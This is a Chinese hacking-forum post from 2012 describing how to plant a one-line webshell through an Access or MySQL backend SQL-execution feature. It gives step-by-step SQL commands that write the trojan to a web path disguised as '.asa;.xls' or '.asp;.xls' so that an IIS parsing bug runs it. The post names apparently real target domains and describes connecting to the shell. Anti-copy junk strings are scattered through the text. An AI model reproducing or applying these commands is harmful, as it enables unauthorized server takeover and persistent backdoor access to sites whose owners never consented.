中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
# p  h' D9 r4 L/ m4 J, lwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
! n9 r$ O" A* L4 P1 F+ \文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
5 l/ W; u0 A3 o0 G; b  D& M: H0 q& D然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
# X( O0 g: ?5 T) e6 o1.create table cmd (a varchar(50))
8 s4 r6 w% @; \- R6 x/ l" b2.insert into cmd (a) values (‘‘)
/ P6 v. ~% o0 w, R1 g7 q3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd6 X/ A& K1 M2 n( t) j' ]3 ?9 U
(把表cmd的内容导出为物理路径的一个EXCEL文件)3 c, Y# T% D3 l3 I/ U* j
4.drop table cmd$ f; b% Q/ B% r5 c$ Q! u& d
利用IIS的BUG成功拿到了WEBSHELL。$ }* l/ Q  @- Z0 y( m: J8 ]0 D
$ C0 ?. Q: |6 D" W) P5 R
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
/ V# |: @  m- X3 o! K0 |2 F$ R
+ q. c, u, h( R9 s  SQL语句意思解释:. m: r0 R9 m6 @8 P3 Z0 d8 o
  第一句
7 `0 z7 A; b% M( W! n0 c0 {  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
# M. _7 f9 x# O& F* y0 ]0 a5 e% Q) ^% Y
  第二句
/ _2 l' d$ E- k8 y% E  在表cmd的a字段插入一句话木马0 \! a# u$ |6 O7 j* f5 u) x
  第三句: a4 u% O% r* }  ?
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
5 }  E# s* w7 J5 z6 ]8 T
2 u% d4 Y8 f6 F5 y  第四句
" t% E& ^$ O. {+ d" |" q  删除建立的cmd表
" c. x0 e" x: N, j3 R  C# F4 b: O1 v% L- t1 Y
  以下内容为测试:
0 X) Q5 T+ w* _  Access利用后台SQL执行命令功能导出WebShell:+ q  n  |4 _9 ^* P/ Q
  这个更简单:- J+ Z) J6 C& e  t
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]3 |2 u! r$ H  f$ G5 [5 Q) @
  或者( C7 n3 L" P$ t- L9 X! A
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]( _$ I8 _9 v3 X6 H# R
& P" h4 S" `' V8 c- O5 ]/ O
  后台有执行SQL语句功能(vote为已知表段)
  Y8 a+ g2 |# Y! M* F# l  希望对大家有所帮助拿shell的又一个思路9 L8 p  A+ Y9 h+ H0 R: B" T





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2